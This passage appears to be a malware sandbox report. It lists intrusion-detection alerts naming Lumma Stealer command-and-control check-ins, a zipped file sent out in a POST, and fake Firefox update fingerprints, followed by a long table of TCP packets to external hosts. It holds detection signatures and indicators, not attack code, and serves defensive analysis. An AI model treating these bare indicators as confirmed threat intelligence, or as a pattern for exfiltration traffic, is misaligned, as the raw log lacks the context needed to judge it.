                                                                                                                                                                                                                                            2025-01-11T11:56:28.731351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:30.316746+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:31.630210+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:31.687606+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449746104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:34.056316+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:34.507897+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747104.21.64.1443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:35.218542+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748162.125.66.18443TCP
                                                                                                                                                                                                                                            2025-01-11T11:56:36.746076+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749162.125.66.15443TCP

                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.935026884 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.935096979 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.935189962 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.937658072 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.937685966 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.578567028 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.578645945 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.583648920 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.583693027 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.584085941 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.639039040 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.641046047 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:11.687324047 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096606970 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096661091 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096682072 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096708059 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096723080 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096739054 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096744061 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096759081 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096775055 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096777916 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096795082 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.096853018 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.188091040 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.188117981 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.188167095 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.188184023 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.188211918 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.188230038 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.193115950 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.193193913 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.197694063 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.197770119 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.197823048 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.198949099 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.198987961 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.199013948 CET49733443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.199028969 CET44349733104.102.49.254192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.226080894 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.226129055 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.226211071 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.226543903 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.226572037 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.691025019 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.691095114 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.696866989 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.696883917 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.697263956 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.698589087 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.698622942 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.698687077 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815361977 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815478086 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815556049 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815562963 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815588951 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815630913 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815675974 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815860033 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.815918922 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816015005 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816036940 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816051960 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.816057920 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.833749056 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.833822012 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.833905935 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.834187031 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.834222078 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.296566963 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.296658993 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.300295115 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.300324917 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.300736904 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.302069902 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.302134037 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.302181005 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795391083 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795509100 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795548916 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795582056 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795591116 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795604944 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795701981 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795728922 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795746088 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795847893 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795875072 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.795882940 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.796303034 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.796329975 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.796339035 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.798743010 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800121069 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800223112 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800254107 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800261974 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.800446987 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.881927967 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.881997108 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882035017 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882061958 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882072926 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882138968 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882271051 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.882271051 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.884588003 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:13.884602070 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362366915 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362421036 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362512112 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.362987995 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.363008976 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.845868111 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.845942020 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.847780943 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.847795010 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.848134041 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849472046 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849605083 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849642038 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849706888 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:14.849716902 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039567947 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039829016 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039907932 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.039989948 CET49736443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.040030003 CET44349736104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.115617990 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.115716934 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.115828991 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.116153002 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.116183996 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.599230051 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.599440098 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.600491047 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.600512028 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.600933075 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.608983040 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.609112978 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:27.609158993 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.095165014 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.095468044 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.095535040 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.095702887 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.095737934 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.265377045 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.265410900 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.265486956 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.265746117 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.265753031 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.731271029 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.731350899 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.732570887 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.732582092 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.732904911 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.734142065 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.734143019 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.734183073 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.734245062 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:28.734253883 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.350394011 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.350692987 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.350778103 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.350954056 CET49744443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.350974083 CET44349744104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.849272013 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.849363089 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.849457979 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.849750042 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:29.849790096 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.316612959 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.316745996 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.318355083 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.318382025 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.319365025 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.320594072 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.320692062 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.320704937 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.740192890 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.740473032 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.740556955 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.741141081 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:30.741185904 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.167813063 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.167853117 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.167948961 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.168271065 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.168288946 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.629936934 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.630209923 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.666641951 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.666657925 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.667574883 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.675342083 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.684968948 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.685022116 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.686753988 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.686810017 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.686909914 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.687380075 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688071966 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688101053 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688231945 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688261986 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688383102 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688410997 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688416004 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688440084 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688549995 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688576937 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688595057 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688611031 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688714027 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688726902 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688770056 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688786030 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688807964 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688817978 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688859940 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688884020 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688906908 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688930988 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.688939095 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:31.698048115 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.570732117 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.570990086 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.571137905 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.571137905 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.583437920 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.583533049 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.583739996 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.583919048 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.583956957 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.873454094 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:33.873477936 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.056217909 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.056315899 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.059698105 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.059726954 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.060133934 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.061563015 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.061604977 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.061667919 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.507720947 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.507967949 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.508119106 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.510432005 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.510483027 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.510514021 CET49747443192.168.2.4104.21.64.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.510529995 CET44349747104.21.64.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.543047905 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.543076038 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.543150902 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.544017076 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.544025898 CET44349748162.125.66.18192.168.2.4
